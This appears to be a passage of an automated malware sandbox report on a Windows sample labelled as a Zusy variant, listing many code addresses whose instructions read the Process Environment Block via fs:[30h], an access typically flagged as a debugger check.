          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009F34B1 mov eax, dword ptr fs:[00000030h]3_2_009F34B1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009F14A9 mov eax, dword ptr fs:[00000030h]3_2_009F14A9
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009F14A9 mov ecx, dword ptr fs:[00000030h]3_2_009F14A9
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA4496 mov eax, dword ptr fs:[00000030h]3_2_00AA4496
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA4496 mov eax, dword ptr fs:[00000030h]3_2_00AA4496
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA4496 mov eax, dword ptr fs:[00000030h]3_2_00AA4496
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA4496 mov eax, dword ptr fs:[00000030h]3_2_00AA4496
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA4496 mov eax, dword ptr fs:[00000030h]3_2_00AA4496
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA4496 mov eax, dword ptr fs:[00000030h]3_2_00AA4496
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA4496 mov eax, dword ptr fs:[00000030h]3_2_00AA4496
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA4496 mov eax, dword ptr fs:[00000030h]3_2_00AA4496
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA4496 mov eax, dword ptr fs:[00000030h]3_2_00AA4496
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA4496 mov eax, dword ptr fs:[00000030h]3_2_00AA4496
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA4496 mov eax, dword ptr fs:[00000030h]3_2_00AA4496
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA4496 mov eax, dword ptr fs:[00000030h]3_2_00AA4496
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA4496 mov eax, dword ptr fs:[00000030h]3_2_00AA4496
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A184E0 mov eax, dword ptr fs:[00000030h]3_2_00A184E0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A184E0 mov eax, dword ptr fs:[00000030h]3_2_00A184E0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A184E0 mov eax, dword ptr fs:[00000030h]3_2_00A184E0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A184E0 mov eax, dword ptr fs:[00000030h]3_2_00A184E0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A184E0 mov eax, dword ptr fs:[00000030h]3_2_00A184E0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A184E0 mov eax, dword ptr fs:[00000030h]3_2_00A184E0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA14FB mov eax, dword ptr fs:[00000030h]3_2_00AA14FB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E8410 mov eax, dword ptr fs:[00000030h]3_2_009E8410
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A02430 mov eax, dword ptr fs:[00000030h]3_2_00A02430
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A02430 mov eax, dword ptr fs:[00000030h]3_2_00A02430
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AB740D mov eax, dword ptr fs:[00000030h]3_2_00AB740D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AB740D mov eax, dword ptr fs:[00000030h]3_2_00AB740D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AB740D mov eax, dword ptr fs:[00000030h]3_2_00AB740D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E4439 mov eax, dword ptr fs:[00000030h]3_2_009E4439
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009FB433 mov eax, dword ptr fs:[00000030h]3_2_009FB433
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009FB433 mov eax, dword ptr fs:[00000030h]3_2_009FB433
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009FB433 mov eax, dword ptr fs:[00000030h]3_2_009FB433
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0746D mov eax, dword ptr fs:[00000030h]3_2_00A0746D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E9450 mov eax, dword ptr fs:[00000030h]3_2_009E9450
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0B477 mov eax, dword ptr fs:[00000030h]3_2_00A0B477
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0B477 mov eax, dword ptr fs:[00000030h]3_2_00A0B477
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0B477 mov eax, dword ptr fs:[00000030h]3_2_00A0B477
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0B477 mov eax, dword ptr fs:[00000030h]3_2_00A0B477
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0B477 mov eax, dword ptr fs:[00000030h]3_2_00A0B477
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0B477 mov eax, dword ptr fs:[00000030h]3_2_00A0B477
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0B477 mov eax, dword ptr fs:[00000030h]3_2_00A0B477
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0B477 mov eax, dword ptr fs:[00000030h]3_2_00A0B477
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0B477 mov eax, dword ptr fs:[00000030h]3_2_00A0B477
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0B477 mov eax, dword ptr fs:[00000030h]3_2_00A0B477
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0B477 mov eax, dword ptr fs:[00000030h]3_2_00A0B477
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0B477 mov eax, dword ptr fs:[00000030h]3_2_00A0B477
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A1A44B mov eax, dword ptr fs:[00000030h]3_2_00A1A44B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A7C450 mov eax, dword ptr fs:[00000030h]3_2_00A7C450
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A7C450 mov eax, dword ptr fs:[00000030h]3_2_00A7C450
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E8466 mov eax, dword ptr fs:[00000030h]3_2_009E8466
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E8466 mov eax, dword ptr fs:[00000030h]3_2_009E8466
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AB8450 mov eax, dword ptr fs:[00000030h]3_2_00AB8450
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A135A1 mov eax, dword ptr fs:[00000030h]3_2_00A135A1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A165A0 mov eax, dword ptr fs:[00000030h]3_2_00A165A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A165A0 mov eax, dword ptr fs:[00000030h]3_2_00A165A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A165A0 mov eax, dword ptr fs:[00000030h]3_2_00A165A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AB05AC mov eax, dword ptr fs:[00000030h]3_2_00AB05AC
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AB05AC mov eax, dword ptr fs:[00000030h]3_2_00AB05AC
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E3591 mov eax, dword ptr fs:[00000030h]3_2_009E3591
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A12581 mov eax, dword ptr fs:[00000030h]3_2_00A12581
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A12581 mov eax, dword ptr fs:[00000030h]3_2_00A12581
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A12581 mov eax, dword ptr fs:[00000030h]3_2_00A12581
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A12581 mov eax, dword ptr fs:[00000030h]3_2_00A12581
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AAB581 mov eax, dword ptr fs:[00000030h]3_2_00AAB581
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AAB581 mov eax, dword ptr fs:[00000030h]3_2_00AAB581
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AAB581 mov eax, dword ptr fs:[00000030h]3_2_00AAB581
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AAB581 mov eax, dword ptr fs:[00000030h]3_2_00AAB581
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A195EC mov eax, dword ptr fs:[00000030h]3_2_00A195EC
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E15C1 mov eax, dword ptr fs:[00000030h]3_2_009E15C1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E95F0 mov eax, dword ptr fs:[00000030h]3_2_009E95F0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E95F0 mov ecx, dword ptr fs:[00000030h]3_2_009E95F0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009FD5E0 mov eax, dword ptr fs:[00000030h]3_2_009FD5E0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009FD5E0 mov eax, dword ptr fs:[00000030h]3_2_009FD5E0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E751A mov eax, dword ptr fs:[00000030h]3_2_009E751A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E751A mov eax, dword ptr fs:[00000030h]3_2_009E751A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E751A mov eax, dword ptr fs:[00000030h]3_2_009E751A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E751A mov eax, dword ptr fs:[00000030h]3_2_009E751A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A1F527 mov eax, dword ptr fs:[00000030h]3_2_00A1F527
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A1F527 mov eax, dword ptr fs:[00000030h]3_2_00A1F527
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A1F527 mov eax, dword ptr fs:[00000030h]3_2_00A1F527
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E9515 mov ecx, dword ptr fs:[00000030h]3_2_009E9515
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A6A537 mov eax, dword ptr fs:[00000030h]3_2_00A6A537
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AAE539 mov eax, dword ptr fs:[00000030h]3_2_00AAE539
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA3518 mov eax, dword ptr fs:[00000030h]3_2_00AA3518
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA3518 mov eax, dword ptr fs:[00000030h]3_2_00AA3518
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA3518 mov eax, dword ptr fs:[00000030h]3_2_00AA3518
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E354C mov eax, dword ptr fs:[00000030h]3_2_009E354C
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E354C mov eax, dword ptr fs:[00000030h]3_2_009E354C
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0C577 mov eax, dword ptr fs:[00000030h]3_2_00A0C577
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0C577 mov eax, dword ptr fs:[00000030h]3_2_00A0C577
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A63540 mov eax, dword ptr fs:[00000030h]3_2_00A63540
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A646A7 mov eax, dword ptr fs:[00000030h]3_2_00A646A7
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA56B6 mov eax, dword ptr fs:[00000030h]3_2_00AA56B6
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA56B6 mov eax, dword ptr fs:[00000030h]3_2_00AA56B6
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E86A0 mov eax, dword ptr fs:[00000030h]3_2_009E86A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A116E0 mov ecx, dword ptr fs:[00000030h]3_2_00A116E0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A106C0 mov eax, dword ptr fs:[00000030h]3_2_00A106C0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A106C0 mov ecx, dword ptr fs:[00000030h]3_2_00A106C0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A106C0 mov eax, dword ptr fs:[00000030h]3_2_00A106C0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A106C0 mov eax, dword ptr fs:[00000030h]3_2_00A106C0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A106C0 mov eax, dword ptr fs:[00000030h]3_2_00A106C0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A106C0 mov eax, dword ptr fs:[00000030h]3_2_00A106C0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A106C0 mov eax, dword ptr fs:[00000030h]3_2_00A106C0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A106C0 mov eax, dword ptr fs:[00000030h]3_2_00A106C0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A106C0 mov eax, dword ptr fs:[00000030h]3_2_00A106C0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A106C0 mov eax, dword ptr fs:[00000030h]3_2_00A106C0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A106C0 mov eax, dword ptr fs:[00000030h]3_2_00A106C0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A106C0 mov eax, dword ptr fs:[00000030h]3_2_00A106C0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A106C0 mov eax, dword ptr fs:[00000030h]3_2_00A106C0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A136CC mov eax, dword ptr fs:[00000030h]3_2_00A136CC
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009F76E2 mov eax, dword ptr fs:[00000030h]3_2_009F76E2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A17620 mov eax, dword ptr fs:[00000030h]3_2_00A17620
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A17620 mov eax, dword ptr fs:[00000030h]3_2_00A17620
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A17620 mov eax, dword ptr fs:[00000030h]3_2_00A17620
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A17620 mov eax, dword ptr fs:[00000030h]3_2_00A17620
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A17620 mov eax, dword ptr fs:[00000030h]3_2_00A17620
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A17620 mov eax, dword ptr fs:[00000030h]3_2_00A17620
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A65623 mov eax, dword ptr fs:[00000030h]3_2_00A65623
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A65623 mov eax, dword ptr fs:[00000030h]3_2_00A65623
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A65623 mov eax, dword ptr fs:[00000030h]3_2_00A65623
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A65623 mov eax, dword ptr fs:[00000030h]3_2_00A65623
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A65623 mov eax, dword ptr fs:[00000030h]3_2_00A65623
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A65623 mov eax, dword ptr fs:[00000030h]3_2_00A65623
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A65623 mov eax, dword ptr fs:[00000030h]3_2_00A65623
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A65623 mov eax, dword ptr fs:[00000030h]3_2_00A65623
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A65623 mov eax, dword ptr fs:[00000030h]3_2_00A65623
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E1618 mov eax, dword ptr fs:[00000030h]3_2_009E1618
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A1C63D mov eax, dword ptr fs:[00000030h]3_2_00A1C63D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009EC600 mov eax, dword ptr fs:[00000030h]3_2_009EC600
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009EC600 mov eax, dword ptr fs:[00000030h]3_2_009EC600
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009EC600 mov eax, dword ptr fs:[00000030h]3_2_009EC600
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A05600 mov eax, dword ptr fs:[00000030h]3_2_00A05600
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A05600 mov eax, dword ptr fs:[00000030h]3_2_00A05600
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A05600 mov eax, dword ptr fs:[00000030h]3_2_00A05600
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A05600 mov eax, dword ptr fs:[00000030h]3_2_00A05600
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A05600 mov ecx, dword ptr fs:[00000030h]3_2_00A05600
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A05600 mov ecx, dword ptr fs:[00000030h]3_2_00A05600
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A05600 mov eax, dword ptr fs:[00000030h]3_2_00A05600
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A05600 mov ecx, dword ptr fs:[00000030h]3_2_00A05600
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A05600 mov ecx, dword ptr fs:[00000030h]3_2_00A05600
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A05600 mov eax, dword ptr fs:[00000030h]3_2_00A05600
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A05600 mov eax, dword ptr fs:[00000030h]3_2_00A05600
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A05600 mov eax, dword ptr fs:[00000030h]3_2_00A05600
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A05600 mov eax, dword ptr fs:[00000030h]3_2_00A05600
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A05600 mov eax, dword ptr fs:[00000030h]3_2_00A05600
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A05600 mov eax, dword ptr fs:[00000030h]3_2_00A05600
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A05600 mov eax, dword ptr fs:[00000030h]3_2_00A05600
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A05600 mov eax, dword ptr fs:[00000030h]3_2_00A05600
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A05600 mov eax, dword ptr fs:[00000030h]3_2_00A05600
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A05600 mov eax, dword ptr fs:[00000030h]3_2_00A05600
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA1608 mov eax, dword ptr fs:[00000030h]3_2_00AA1608
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009EA63B mov eax, dword ptr fs:[00000030h]3_2_009EA63B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009EA63B mov eax, dword ptr fs:[00000030h]3_2_009EA63B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009FB62E mov eax, dword ptr fs:[00000030h]3_2_009FB62E
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009FB62E mov eax, dword ptr fs:[00000030h]3_2_009FB62E
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A1A61C mov eax, dword ptr fs:[00000030h]3_2_00A1A61C
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A1A61C mov eax, dword ptr fs:[00000030h]3_2_00A1A61C
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009EE620 mov eax, dword ptr fs:[00000030h]3_2_009EE620
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A04670 mov eax, dword ptr fs:[00000030h]3_2_00A04670
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A04670 mov eax, dword ptr fs:[00000030h]3_2_00A04670
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A04670 mov eax, dword ptr fs:[00000030h]3_2_00A04670
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A04670 mov eax, dword ptr fs:[00000030h]3_2_00A04670
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009F766D mov eax, dword ptr fs:[00000030h]3_2_009F766D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A76652 mov eax, dword ptr fs:[00000030h]3_2_00A76652
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009F8794 mov eax, dword ptr fs:[00000030h]3_2_009F8794
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A67794 mov eax, dword ptr fs:[00000030h]3_2_00A67794
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A67794 mov eax, dword ptr fs:[00000030h]3_2_00A67794
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A67794 mov eax, dword ptr fs:[00000030h]3_2_00A67794
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A137EB mov eax, dword ptr fs:[00000030h]3_2_00A137EB
